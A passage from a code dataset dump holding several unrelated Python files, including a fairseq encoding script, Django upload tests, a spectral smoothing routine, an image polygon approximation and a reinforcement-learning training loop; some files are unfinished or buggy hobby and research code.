db_errors)])\n","sub_path":"ichnaea/api/locate/tests/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":14383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"276427095","text":"#!/usr/bin/env python3\n\n\n__author__ = \"Jonathan Marburger\"\n__version__ = \"0.1.0\"\n__license__ = \"SRU\"\n\n\n\"\"\"function to read the lines of the input file\"\"\"\ndef readFile():\n read = open(\"SchruteStuff.txt\", \"r\")\n out = read.readlines()\n read.close()\n return out\n\n\ndef open_file(fil):\n out_list = open(fil, 'r')\n for line in out_list:\n new_out_list = line.split('x')\n\n def calc_surface(are):\n are.sort()\n\n length = int(are[0])\n height = int(are[1])\n width = int(are[2])\n\n slack = length * width\n surface = (2 * length * width) + (2 * length * height) + (2 * width * height)\n print(str(surface))\n max_foil = surface + slack\n return max_foil\n def tape(arr):\n arr.sort()\n\n length = int(arr[0])\n height = int(arr[1])\n width = int(arr[2])\n\n slack = length * width\n ribbon = (length * width * height)\n print(str(ribbon))\n max_tape = ribbon + slack\n return max_tape\n\n temp_surface = calc_surface(new_out_list)\n print(str(temp_surface))\n\n summation_foil = 0\n summation_tape = 0\n\n summation_foil += temp_surface\n summation_tape += tape\n\n print(summation_foil)\n print(summation_tape)\n\n\n\"\"\"main function here\"\"\"\n\n\ndef main():\n filename = input('Input the file you want to use: ')\n open_file(filename)\n\n return 0\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"OfficeAssign.py","file_name":"OfficeAssign.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"557207313","text":"#!/usr/bin/env python3 -u\n# Copyright (c) 2017-present, Facebook, Inc.\n# All rights reserved.\n#\n# This source code is licensed under the license found in the LICENSE file in\n# the root directory of this source tree. An additional grant of patent rights\n# can be found in the PATENTS file in the same directory.\n\"\"\"\nTranslate pre-processed data with a trained model.\n\"\"\"\n\nimport torch\n\nfrom fairseq import bleu, data, options, progress_bar, tasks, tokenizer, utils\nfrom fairseq.meters import StopwatchMeter, TimeMeter\nfrom fairseq.sequence_encoder import SequenceEncoder\nimport json\nimport numpy as np\nfrom fairseq.sequence_generator import SequenceGenerator\nimport torch.nn as nn\nfrom fairseq.sequence_scorer import SequenceScorer\n\n\ndef main(args):\n assert args.path is not None, '--path required for generation!'\n assert not args.sampling or args.nbest == args.beam, \\\n '--sampling requires --nbest to be equal to --beam'\n assert args.replace_unk is None or args.raw_text, \\\n '--replace-unk requires a raw text dataset (--raw-text)'\n\n if args.max_tokens is None and args.max_sentences is None:\n args.max_tokens = 12000\n print(args)\n\n use_cuda = torch.cuda.is_available() and not args.cpu\n\n # Load dataset splits\n task = tasks.setup_task(args)\n task.load_dataset(args.gen_subset)\n print('| {} {} {} examples'.format(args.data, args.gen_subset, len(task.dataset(args.gen_subset))))\n\n # Set dictionaries\n src_dict = task.source_dictionary\n tgt_dict = task.target_dictionary\n \n key = None\n if args.task != 'translation':\n key = args.source_lang + '-' + args.target_lang\n\n # Load ensemble\n print('| loading model(s) from {}'.format(args.path))\n models, _ = utils.load_ensemble_for_inference(args.path.split(':'), task, model_arg_overrides=eval(args.model_overrides)) # ,pair=key\n\n for model in models:\n model.keys = [key]\n\n # Optimize ensemble for generation\n for model in models:\n model.make_generation_fast_(\n beamable_mm_beam_size=None if args.no_beamable_mm else args.beam,\n need_attn=args.print_alignment,\n )\n if args.fp16:\n model.half()\n\n # Load alignment dictionary for unknown word replacement\n # (None if no unknown word replacement, empty if no path to align dictionary)\n align_dict = utils.load_align_dict(args.replace_unk)\n\n # Load dataset (possibly sharded)\n itr = task.get_batch_iterator(\n dataset=task.dataset(args.gen_subset),\n max_tokens=args.max_tokens,\n max_sentences=args.max_sentences,\n max_positions=utils.resolve_max_positions(\n task.max_positions(),\n *[model.max_positions() for model in models]\n ),\n ignore_invalid_inputs=args.skip_invalid_size_inputs_valid_test,\n required_batch_size_multiple=8,\n num_shards=args.num_shards,\n shard_id=args.shard_id,\n ).next_epoch_itr(shuffle=False)\n\n # Initialize generator\n gen_timer = StopwatchMeter()\n\n encoder = SequenceEncoder(models, task.target_dictionary)\n\n\n if use_cuda:\n encoder.cuda()\n\n pad = options.eval_bool(args.pad)\n\n # Generate and compute BLEU score\n num_sentences = 0\n has_target = True\n with progress_bar.build_progress_bar(args, itr) as t:\n if args.task=='factored_translation':\n encodings = encoder.encode_batched_itr_factored(t, cuda=use_cuda, timer=gen_timer, pad=pad)\n else:\n encodings = encoder.encode_batched_itr(t, cuda=use_cuda, timer=gen_timer,pad=pad)\n data = {}\n i = 0\n for id,src,ref,hypos in encodings:\n if i >= args.n_points:\n break\n data[str(id.cpu().data.numpy())] = {\n 'src':src.cpu().data.numpy().tolist(),\n 'ref':ref.cpu().data.numpy().tolist(),\n 'encoding':hypos[0]['encoding'].cpu().data.numpy().tolist()\n }\n i += 1\n with open(args.output_file,'w') as f:\n json.dump(data,f)\n print('Done')\n\n\nif __name__ == '__main__':\n parser = options.get_generation_parser()\n options.add_encode_args(parser)\n args = options.parse_args_and_arch(parser)\n main(args)\n","sub_path":"encode.py","file_name":"encode.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"624521057","text":"from django.test import TestCase\nfrom django.test import Client\nfrom django.contrib.auth import get_user_model\n\n# Create your tests here.\n\n\nclass CheckUI(TestCase):\n anonymousclient = Client()\n\n @classmethod\n def setUpTestData(cls):\n User = get_user_model()\n cls.user = User.objects.create_user(email='tanfuser@gsa.gov')\n cls.superuser = User.objects.create_superuser(email='tanfsuperuser@gsa.gov')\n cls.staffuser = User.objects.create_user(email='tanfstaff@gsa.gov', is_staff=True)\n\n def test_about(self):\n \"\"\"about page has proper data\"\"\"\n response = self.anonymousclient.get(\"/about/\")\n self.assertIn(b'Welcome to the TANF Data Reporting system', response.content)\n\n def test_authentication(self):\n \"\"\"We cannot get into pages if we are not authenticated\"\"\"\n pages = {\n '/': b'Current user',\n '/status/': b'Current user',\n '/viewquarter/': b'Current user',\n }\n for k, v in pages.items():\n response = self.anonymousclient.get(k)\n self.assertNotEqual(response.status_code, 200)\n self.assertNotIn(v, response.content, msg='anonymous ' + k)\n\n self.client.force_login(self.user)\n response = self.client.get(k)\n self.assertEqual(response.status_code, 200)\n self.assertIn(v, response.content, msg='user ' + k)\n\n self.client.force_login(self.staffuser)\n response = self.client.get(k)\n self.assertEqual(response.status_code, 200)\n self.assertIn(v, response.content, msg='user ' + k)\n\n self.client.force_login(self.superuser)\n response = self.client.get(k)\n self.assertEqual(response.status_code, 200)\n self.assertIn(v, response.content, msg='superuser ' + k)\n\n def test_staffuser_authentication(self):\n \"\"\"We cannot get into admin pages if we are not staff or superuser authenticated\"\"\"\n self.assertTrue(self.staffuser.is_staff)\n\n page = '/useradmin'\n response = self.anonymousclient.get(page)\n self.assertRedirects(response, '/admin/login/?next=/useradmin', status_code=302, target_status_code=200)\n\n self.client.force_login(self.user)\n response = self.client.get(page)\n self.assertRedirects(response, '/admin/login/?next=/useradmin', status_code=302, target_status_code=200)\n\n self.client.force_login(self.superuser)\n response = self.client.get(page)\n self.assertRedirects(response, '/admin/users/tanfuser/', status_code=302, target_status_code=200)\n\n self.client.force_login(self.staffuser)\n response = self.client.get(page)\n self.assertRedirects(response, '/admin/users/tanfuser/', status_code=302, target_status_code=200)\n\n def test_upload_exists(self):\n \"\"\"upload page has proper data\"\"\"\n self.client.force_login(self.user)\n response = self.client.get(\"/\")\n self.assertIn(b'Upload to the TANF Data Reporting system', response.content)\n\n def test_upload_data(self):\n \"\"\"upload page accepts data, sends us to the Status page, and status page has a file\"\"\"\n self.client.force_login(self.user)\n with open('upload/fixtures/testdata.txt') as f:\n response = self.client.post(\"/\", {'name': 'myfile', 'myfile': f}, follow=True)\n self.assertIn(b'Status', response.content)\n self.assertIn(b'tanfuser@gsa.gov_', response.content)\n self.assertIn(b'_testdata.txt', response.content)\n","sub_path":"upload/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"248147717","text":"#!/usr/bin/env python3.6\n# -*- coding: utf-8 -*-\n\n\n#import fonctions \n# On créé une liste de mot (8caractère max)\nlisteMot = {\n 0:'vache',\n 1:'musique',\n 2:'ampoule',\n 3:'energie',\n 4:'crabe',\n 5:'crevette',\n}\n\n\n\n# Nombre de chances\nnmbreChance = 8\n#nmbreChance = fonctions.CompteurChance\n","sub_path":"donnees.py","file_name":"donnees.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"537335628","text":"#program to smooth spectra taking into account the flux uncertainties (ivar)\n#Elisa Toloba, UOP, August 24th 2018\n#-------------------------------\nimport pdb\nimport numpy as np\nfrom astropy.io import fits\n#-------------------------------\ndef gauss_ivar(lamb1, spec1, ivar1, sig):\n\n lamb2=lamb1\n n1=len(lamb1)\n n2=len(lamb2)\n f=np.arange(n1)\n spec2=np.empty(n2)\n ivar2=np.empty(n2)\n\n dlam=np.repeat(sig, n2)\n dlambda1=np.diff(lamb1)\n maxsigma=4.\n halfwindow=int(np.ceil(1.1*maxsigma*max(dlam)/min(dlambda1)))\n for i in range(n2):\n if f[i]-halfwindow <= 0:\n low=0\n else:\n low=f[i]-halfwindow\n\n if f[i]+halfwindow < (n1-1) and f[i]+halfwindow > 0:\n high=f[i]+halfwindow\n else:\n high=int(n2-1)\n if low < n1 and low < high:\n w=np.array(np.where(abs(lamb1[low:high+1]-lamb2[i]) 0:\n gauss=np.exp(-1.*(lamb1[w] - lamb2[i])**2/(2.0*dlam[i]**2))\n temp=ivar1[w]*gauss\n temp2=np.sum(temp)\n spec2[i]=np.sum(spec1[w]*temp)/temp2\n ivar2[i]=temp2**2/np.sum(temp*gauss)\n\n return spec2, ivar2\n#--------------------------------\n\n","sub_path":"lib/smooth_gauss.py","file_name":"smooth_gauss.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"51435830","text":"import numpy as np\n\nimport cv2\nimport matplotlib.pyplot as plt\n\n\ndef is_inf(n):\n return n == np.float(\"Inf\") or n == np.float(\"-Inf\")\n\n\ndef mpp_2(img_path, T):\n im = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE)\n ret, thresh = cv2.threshold(im, 127, 255, 0)\n edges = np.zeros(im.shape)\n _, contours, _ = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n\n mpp_ls = []\n p1 = contours[0][0, 0, :]\n p2 = contours[0][1, 0, :]\n dx = p2[0] - p1[0]\n dy = p2[1] - p1[1]\n slope = dy / dx\n intercept = p1[1] - slope * p1[0]\n error = 0\n prev = p2\n x_const = p2[0]\n for i in range(2, contours[0].shape[0]):\n p = contours[0][i, 0, :]\n if not is_inf(slope) or slope == 0:\n yp = slope * p[0] + intercept\n error = error + abs(yp - p[1])\n else:\n if is_inf(slope):\n xp = x_const\n else:\n xp = (1 / slope) * (p[1] - intercept)\n error = error + abs(xp - p[0])\n\n if error > T:\n mpp_ls.append(p)\n error = 0\n dx = p[0] - prev[0]\n dy = p[1] - prev[1]\n x_const = p[0]\n slope = np.float(dy) / dx\n intercept = p[1] - slope * p[0]\n\n prev = p\n\n vertices = len(mpp_ls)\n mpp_np = np.array(mpp_ls)\n mpp_np = np.expand_dims(mpp_np, 1)\n pts = mpp_np.reshape((-1, 1, 2))\n cv2.polylines(edges, [pts], True, (255, 255, 255))\n return edges, vertices\n\n\nimg_0, v_0 = mpp_2(\"img2.png\", -1)\nimg_5, v_5 = mpp_2(\"img2.png\", 5)\nimg_10, v_10 = mpp_2(\"img2.png\", 10)\nimg_20, v_20 = mpp_2(\"img2.png\", 20)\nimg_40, v_40 = mpp_2(\"img2.png\", 40)\nimg_80, v_80 = mpp_2(\"img2.png\", 80)\nimg_160, v_160 = mpp_2(\"img2.png\", 160)\n\nplt.figure(figsize=(13, 13))\nplt.subplot(231), plt.imshow(img_0, cmap='gray'), plt.title(str(v_0))\nplt.xticks([]), plt.yticks([])\nplt.subplot(232), plt.imshow(img_5, cmap='gray'), plt.title(str(v_5))\nplt.xticks([]), plt.yticks([])\nplt.subplot(233), plt.imshow(img_10, cmap='gray'), plt.title(str(v_10))\nplt.xticks([]), plt.yticks([])\nplt.subplot(234), plt.imshow(img_20, cmap='gray'), plt.title(str(v_20))\nplt.xticks([]), plt.yticks([])\nplt.subplot(235), plt.imshow(img_40, cmap='gray'), plt.title(str(v_40))\nplt.xticks([]), plt.yticks([])\nplt.subplot(236), plt.imshow(img_80, cmap='gray'), plt.title(str(v_80))\nplt.xticks([]), plt.yticks([])\n\nplt.show()\n","sub_path":"MPP_2.py","file_name":"MPP_2.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"318525271","text":"# 1 словарь с ключем в виде русских букв и занченим транслита на англ\n# 2 получаем слово от пользовтаеля\n# 3 перводим в строку\n# 4 через цикл перебераем каждое знаечение и добавляем в новый список значение второе словаря\n# 5 соединяем список в строку\n# 6 выводим пользовталею значение\n\n# Список руский\nletRu = 'а б в г д е ё ж з и й к л м н о п р с т у ф х ц ч ш щ ъ ы ь э ю я'.split()\n# Список англ\nletEN = 'a b v g d e yo zh z i j k l m n o p r s t u f h c ch sh shch \" y \\' e yu ya'.split()\n\n# Функция для создания словаря из 2 списков\ndef slovar(ru,en):\n translit_ruls = {}\n a = 0\n b = 0\n # Слияние списков в словарь\n for i in ru :\n translit_ruls[ ru[a] ] = en[b]\n a+= 1\n b+= 1\n\n Letter_ru.update(translit_ruls )\n # Letter_ru = translit_ruls.copy() ХУЛИ НЕ РАБОТАЕТ???????????????????\n# Объвление словаря\nLetter_ru = {}\n# Вызов функции для слияния списков в словарь ^\nslovar(letRu,letEN)\n\nSlovo = input()\n# Slovo.lower()\n# print(Slovo)\na = list(Slovo.lower())\nprint(a)\ns ,b = '',''\nfor i in a:\n b = Letter_ru.get(i)\n s = s + b\nprint(s.title())\n\nprint('prive')","sub_path":"python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"180326561","text":"a = [ \"apple\", \"banana\", \"carrot\", \"donut\" ]\r\nb = a\r\nb.remove(\"apple\")\r\nc = a + [ \"eclair\" ]\r\nd = c[1:]\r\nd.insert(2, \"fig\")\r\n\r\nprint(a)\r\nprint(b)\r\nprint(c)\r\nprint(d)\r\n\r\n\r\n\r\n\r\n\r\nmyList = [\"a\", \"b\", 1, 2, 3, 2, 4, 6, 10, 20, 30]\r\nhalf = len(myList) // 2\r\nfor i in range(half):\r\n print(myList[i], myList[i + half])\r\n","sub_path":"lists on check 3 written.py","file_name":"lists on check 3 written.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"598735491","text":"import torch\nfrom torch.autograd import Variable\nimport random\nfrom transition import Transition\n\n# Discount factor for future rewards, and Greedy Epsilon Constant:\nGAMMA = 0.5\nEPS = 0.05\n\n\ndef train(model, epoch, optimizer, train_loader, args, writer, reinforcement_learner, request_dict, accuracy_dict, episode):\n\n # Initialize training:\n model.train()\n\n batch_correct = 0.0\n batch_predict = 0.0\n batch_request = 0.0\n batch_reward = 0.0\n\n for b in range(args.batch_size):\n \n # Collect a random batch:\n image_batch, label_batch = train_loader.__iter__().__next__()\n\n # Keep a memory of the episode:\n transitions = []\n\n # Episode Statistics:\n episode_correct = 0.0\n episode_predict = 0.0\n episode_request = 0.0\n episode_reward = 0.0\n\n # Create initial state:\n state = []\n label_dict = []\n for i in range(args.mini_batch_size):\n state.append([0 for i in range(args.class_vector_size)])\n label_dict.append({})\n\n # Initialize model between each episode:\n hidden = model.reset_hidden(args.mini_batch_size)\n\n # Statistics again: \n for v in request_dict.values():\n v.append([])\n for v in accuracy_dict.values():\n v.append([])\n\n # Placeholder for loss Variable:\n if (args.cuda):\n loss = Variable(torch.zeros(args.mini_batch_size).type(torch.Tensor)).cuda()\n else:\n loss = Variable(torch.zeros(args.mini_batch_size).type(torch.Tensor))\n\n # EPISODE LOOP:\n for i_e in range(len(label_batch)):\n\n # Zeroing accumulated gradients:\n optimizer.zero_grad()\n\n episode_labels = label_batch[i_e]\n episode_images = image_batch[i_e]\n\n # Tensoring the state:\n state = torch.FloatTensor(state)\n \n # Need to add image to the state vector:\n flat_images = episode_images.squeeze().view(args.mini_batch_size, -1)\n\n # Concatenating possible labels/zero vector with image, to create the environment state:\n state = torch.cat((state, flat_images), 1)\n \n one_hot_labels = []\n for i in range(args.mini_batch_size):\n true_label = episode_labels[i]\n\n # Creating one hot labels:\n one_hot_labels.append([1 if j == true_label else 0 for j in range(args.class_vector_size)])\n\n # Logging statistics:\n if (true_label not in label_dict[i]):\n label_dict[i][true_label] = 1\n else:\n label_dict[i][true_label] += 1\n\n # Selecting an action to perform (Epsilon Greedy):\n if (args.cuda):\n q_values, hidden = model(Variable(state).type(torch.FloatTensor).cuda(), hidden)\n else:\n q_values, hidden = model(Variable(state).type(torch.FloatTensor), hidden)\n\n # Choosing the largest Q-values:\n model_actions = q_values.data.max(1)[1].view(args.mini_batch_size)\n\n # Performing Epsilon Greedy Exploration:\n agent_actions = []\n for i in range(args.mini_batch_size):\n\n # Model choice:\n if (random.random() > EPS):\n agent_actions.append(model_actions[i])\n\n # Epsilong Greedy:\n else:\n epsilon_action = random.randint(0, 2)\n\n # Request:\n if (epsilon_action == 0):\n agent_actions.append(args.class_vector_size)\n\n # Incorrect Prediction:\n elif (epsilon_action == 1):\n wrong_label = random.randint(0, args.class_vector_size - 1)\n while (wrong_label == episode_labels[i]):\n wrong_label = random.randint(0, args.class_vector_size - 1)\n agent_actions.append(wrong_label)\n\n # Correct Prediction:\n else:\n agent_actions.append(episode_labels[i])\n \n # Collect rewards:\n rewards = reinforcement_learner.collect_reward_batch(agent_actions, one_hot_labels, args.mini_batch_size)\n\n # Collecting average reward at time t:\n episode_reward += float(sum(rewards)/args.mini_batch_size)\n\n # Just some statistics logging:\n for i in range(args.mini_batch_size):\n true_label = episode_labels[i]\n\n # Statistics:\n reward = rewards[i]\n if (reward == reinforcement_learner.request_reward):\n episode_request += 1\n episode_predict += 1\n if (label_dict[i][true_label] in request_dict):\n request_dict[label_dict[i][true_label]][-1].append(1)\n if (label_dict[i][true_label] in accuracy_dict):\n accuracy_dict[label_dict[i][true_label]][-1].append(0)\n elif (reward == reinforcement_learner.prediction_reward):\n episode_correct += 1.0\n episode_predict += 1.0\n if (label_dict[i][true_label] in request_dict):\n request_dict[label_dict[i][true_label]][-1].append(0)\n if (label_dict[i][true_label] in accuracy_dict):\n accuracy_dict[label_dict[i][true_label]][-1].append(1)\n else:\n episode_predict += 1.0\n if (label_dict[i][true_label] in request_dict):\n request_dict[label_dict[i][true_label]][-1].append(0)\n if (label_dict[i][true_label] in accuracy_dict):\n accuracy_dict[label_dict[i][true_label]][-1].append(0)\n\n # Tensoring the reward:\n #rewards = Variable(torch.Tensor([rewards]))\n rewards = torch.Tensor([rewards])\n\n # Observe next state and images:\n next_state_start = reinforcement_learner.next_state_batch(agent_actions, one_hot_labels, args.mini_batch_size)\n\n # Need to collect the representative Q-values:\n agent_actions = torch.LongTensor(agent_actions).unsqueeze(1)\n #agent_actions = Variable(torch.LongTensor(agent_actions).unsqueeze(1))\n #current_q_values = q_values.gather(1, agent_actions)\n\n # Non-final state:\n if (i_e < args.episode_size - 1):\n # Collect next image:\n next_flat_images = image_batch[i_e + 1].squeeze().view(args.mini_batch_size, -1)\n\n # Create next state:\n next_state = torch.cat((torch.FloatTensor(next_state_start), next_flat_images), 1)\n\n transitions.append(Transition(state, agent_actions, next_state, rewards))\n \"\"\"\n # Get target value for next state:\n target_value = model(Variable(next_state, volatile=True), hidden)[0].max(1)[0]\n\n # Making it un-volatile again:\n target_value.volatile = False\n\n # Discounting the next state + reward collected in this state:\n discounted_target_value = (GAMMA*target_value) + rewards\n\n # Calculating Bellman error:\n difference = discounted_target_value.squeeze().sub(current_q_values)\n loss = loss.add(difference.pow(2).squeeze())\n \"\"\"\n\n # Final state:\n else:\n transitions.append(Transition(state, agent_actions, None, rewards))\n \"\"\"\n # As there is no next state, we only have the rewards:\n discounted_target_value = rewards\n\n\n # Calculating Bellman error:\n difference = discounted_target_value.squeeze().sub(current_q_values)\n loss = loss.add(difference.pow(2).squeeze())\n \"\"\"\n \n # Update current state:\n state = next_state_start\n\n ### END TRAIN LOOP ###\n\n optimize(transitions, model, args)\n\n \"\"\"\n # Zeroing accumulated gradients:\n optimizer.zero_grad()\n\n # Averaging Loss over batch (SGD):\n avg_loss = torch.mean(loss)\n\n # Backpropagating error:\n avg_loss.backward()\n\n # Taking one step in the SGD optimizer:\n optimizer.step()\n \"\"\"\n\n\n # Collect stats:\n batch_correct += episode_correct\n batch_predict += episode_predict\n batch_request += episode_request\n batch_reward += episode_reward\n\n \n\n print(\"\\n--- Epoch \" + str(epoch) + \", Episode \" + str(episode + b + 1) + \" Statistics ---\")\n print(\"Instance\\tAccuracy\\tRequests\") \n for key in accuracy_dict.keys():\n prediction_batch = accuracy_dict[key][(-1*args.batch_size):]\n request_batch = request_dict[key][(-1*args.batch_size):]\n \n # Accuracy:\n predictions = .0\n nof_predictions = .0\n\n # Request:\n requests = .0\n nof_requests = .0\n\n # Averaging:\n for episode in range(len(prediction_batch)):\n\n # Accuracy:\n predictions += sum(prediction_batch[episode])\n nof_predictions += len(prediction_batch[episode])\n\n # Request:\n requests += sum(request_batch[episode])\n nof_requests += len(request_batch[episode])\n\n accuracy = float(predictions/nof_predictions)\n request_percentage = float(requests/nof_requests)\n \n print(\"Instance \" + str(key) + \":\\t\" + str(100.0*accuracy)[0:4] + \" %\" + \"\\t\\t\" + str(100.0*request_percentage)[0:4] + \" %\")\n \n\n # Even more status update:\n print(\"\\n+------------------STATISTICS----------------------+\")\n total_prediction_accuracy = float((100.0 * batch_correct) / max(1, batch_predict-batch_request))\n print(\"Batch Average Prediction Accuracy = \" + str(total_prediction_accuracy)[:5] + \" %\")\n total_accuracy = float((100.0 * batch_correct) / batch_predict)\n print(\"Batch Average Accuracy = \" + str(total_accuracy)[:5] + \" %\")\n total_loss = float(avg_loss.data[0])\n print(\"Batch Average Loss = \" + str(total_loss)[:5])\n total_requests = float((100.0 * batch_request) / (args.batch_size*args.episode_size))\n print(\"Batch Average Requests = \" + str(total_requests)[:5] + \" %\")\n total_reward = float(batch_reward/args.batch_size)\n print(\"Batch Average Reward = \" + str(total_reward)[:5])\n print(\"+--------------------------------------------------+\\n\")\n\n ### LOGGING TO TENSORBOARD ###\n data = {\n 'training_total_requests': total_requests,\n 'training_total_accuracy': total_accuracy,\n 'training_total_loss': total_loss,\n 'training_average_reward': total_reward\n }\n\n for tag, value in data.items():\n writer.scalar_summary(tag, value, epoch)\n ### DONE LOGGING ###\n\n return total_prediction_accuracy, total_requests, total_accuracy, total_loss, total_reward, request_dict, accuracy_dict\n\n\ndef optimize(transitions, model, args):\n\n batch = Transition(*zip(*transitions))\n\n hidden = model.reset_hidden(args.mini_batch_size)\n\n non_final_mask = torch.ByteTensor(tuple(map(lambda s: s is not None,\n batch.next_state)))\n non_final_next_states = Variable(torch.cat([s for s in batch.next_state\n if s is not None]),\n volatile=True)\n\n state_batch = Variable(torch.cat(batch.state))\n action_batch = Variable(torch.cat(batch.action))\n reward_batch = Variable(torch.cat(batch.reward))\n\n q_values, hidden = model(state_batch, hidden, seq=args.episode_size)\n\n print(q_values)\n print(action_batch)\n state_action_values = q_values.gather(1, action_batch)\n\n # Compute V(s_{t+1}) for all next states.\n next_state_values, _ = Variable(torch.zeros(args.episode_size).type(Tensor), hidden)\n next_state_values[non_final_mask] = model(non_final_next_states, hidden, seq=args.episode_size).max(1)[0]\n # Now, we don't want to mess up the loss with a volatile flag, so let's\n # clear it. After this, we'll just end up with a Variable that has\n # requires_grad=False\n next_state_values.volatile = False\n # Compute the expected Q values\n expected_state_action_values = (next_state_values * GAMMA) + reward_batch\n\n # Compute Huber loss\n loss = F.smooth_l1_loss(state_action_values, expected_state_action_values)\n\n # Optimize the model\n optimizer.zero_grad()\n loss.backward()\n\n for param in model.parameters():\n param.grad.data.clamp_(-1, 1)\n optimizer.step()\n\n\n\n\n\ndef print_graph(grad_fn):\n seen = set()\n params = None\n\n def size_to_str(size):\n return '('+(', ').join(['%d' % v for v in size])+')'\n\n def add_nodes(var):\n\n \n if torch.is_tensor(var):\n print(\"Node Orange = IS TENSOR: \", str(id(var)))\n elif hasattr(var, 'variable'):\n u = var.variable\n name = param_map[id(u)] if params is not None else ''\n node_name = '%s\\n %s' % (name, size_to_str(u.size()))\n print(\"Node BLUE = \", str(id(var)), node_name)\n else:\n print(\"Node = \", str(type(var).__name__), str(id(var)))\n if var not in seen:\n seen.add(var)\n if hasattr(var, 'next_functions'):\n for u in var.next_functions:\n if u[0] is not None:\n add_nodes(u[0])\n if hasattr(var, 'saved_tensors'):\n for t in var.saved_tensors:\n add_nodes(t)\n add_nodes(grad_fn)\n\n","sub_path":"reinforcement/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":13855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"145592600","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\n\nfrom pallets_sphinx_themes import ProjectLink, get_version\n\n# Project --------------------------------------------------------------\n\nproject = \"WTForms-Django\"\ncopyright = \"2008, WTForms team\"\nauthor = \"WTForms team\"\nrelease, version = get_version(\"WTForms-Django\")\n\n# General --------------------------------------------------------------\n\nmaster_doc = \"index\"\n\nextensions = [\"sphinx.ext.autodoc\", \"sphinx.ext.intersphinx\"]\n\nintersphinx_mapping = {\n \"python\": (\"https://docs.python.org/3/\", None),\n \"wtforms\": (\"https://wtforms.readthedocs.io/en/stable/\", None),\n \"django\": (\n \"https://docs.djangoproject.com/en/stable/\",\n \"https://docs.djangoproject.com/en/stable/_objects/\",\n ),\n}\n\n# HTML -----------------------------------------------------------------\n\nhtml_theme = \"flask\"\nhtml_context = {\n \"project_links\": [\n ProjectLink(\"PyPI releases\", \"https://pypi.org/project/WTForms-Django/\"),\n ProjectLink(\"Source Code\", \"https://github.com/wtforms/wtforms-django/\"),\n ProjectLink(\"Issue Tracker\", \"https://github.com/wtforms/wtforms/issues/\"),\n ]\n}\nhtml_sidebars = {\n \"index\": [\"project.html\", \"searchbox.html\"],\n \"**\": [\"localtoc.html\", \"relations.html\", \"searchbox.html\"],\n}\nhtml_show_sourcelink = False\n\n# LaTeX ----------------------------------------------------------------\n\nlatex_documents = [\n (master_doc, project + \".tex\", project + \" Documentation\", author, \"manual\")\n]\n","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"297866024","text":"# -*- coding: utf-8 -*-\nfrom PIL import Image\nfrom DeCNN import train_data_prepare as tdp\nfrom DeCNN import DeconvNN_CS_1 as De1\nfrom DeCNN import showResult as sR\nimport os\nimport time\n\n\ndef save_Result_img(imgArrayList, oriFileDir, saveDir, nn, crop_strides, start):\n img1List = get_imgArrayList_from_nn(imgArrayList=imgArrayList, nn=nn)\n end = time.clock()\n print(\"Run time:\", (end-start))\n print(\"average Run time:\", ((end-start)/12))\n img1List_ori = tdp.down_dim(img1List)\n tdp.paste_from_crops_to_fileDir(img1List=img1List_ori, oriFileDir=oriFileDir, saveDir=saveDir,\n crop_strides=crop_strides)\n return\n\n\ndef get_imgArrayList_from_nn(imgArrayList, nn):\n reconstructList = []\n batch_num = int(len(imgArrayList)/De1.batch_size)\n for i in range(batch_num):\n img_arr_batch = De1.get_block_from_data(imgArrayList, data_batch_size=De1.batch_size, j=i)#反卷积网络用的相同函数\n reconstruct_batch = nn.getReconstruct(img_arr_batch, De1.ge_csphi(ge_new=False))\n for re_img_array in reconstruct_batch:\n reconstructList.append(re_img_array)\n print(\"len(reconstructList):\", len(reconstructList))\n return reconstructList\n\n\ndef save_reconImg_from_nn(nn):\n dirs = \"./Training_Data_L/test_images/noiseless/\"\n saveDir = './Training_Data_L/re_test_images/noiseless/v1/mr_0_01_e1000/'\n imgList = tdp.eachFile(dirs)\n #print(\"last one:\", imgList[len(imgList)-1])\n crop_strides = tdp.crops_width\n imgArrayList = tdp.crop_img(imgList, crop_strides=crop_strides)\n imgArrayList_up = tdp.up_dim(imgArrayList)\n start = time.clock()\n save_Result_img(imgArrayList=imgArrayList_up, oriFileDir=dirs, saveDir=saveDir, nn=nn, crop_strides=crop_strides, start = start)\n return\n\n\ndef cal_each_mean_PSNR(oriImgDir, reconImgDir):\n\n oriImgFullPaths = tdp.eachFile(oriImgDir)\n reconImgFullPaths = tdp.eachFile(reconImgDir)\n #oriImgList = []\n #reconImgList = []\n oridict = {}\n redict = {}\n for oriImgFullPath in oriImgFullPaths:\n oriImgName = os.path.split(oriImgFullPath)[1].split(\".\")[0]\n oridict[oriImgName] = oriImgFullPath\n '''\n a.append(os.path.split(oriImgFullPath)[1])\n oriImg = Image.open(oriImgFullPath)\n oriImgList.append(oriImg)\n '''\n for reconImgFullPath in reconImgFullPaths:\n reconImgName = 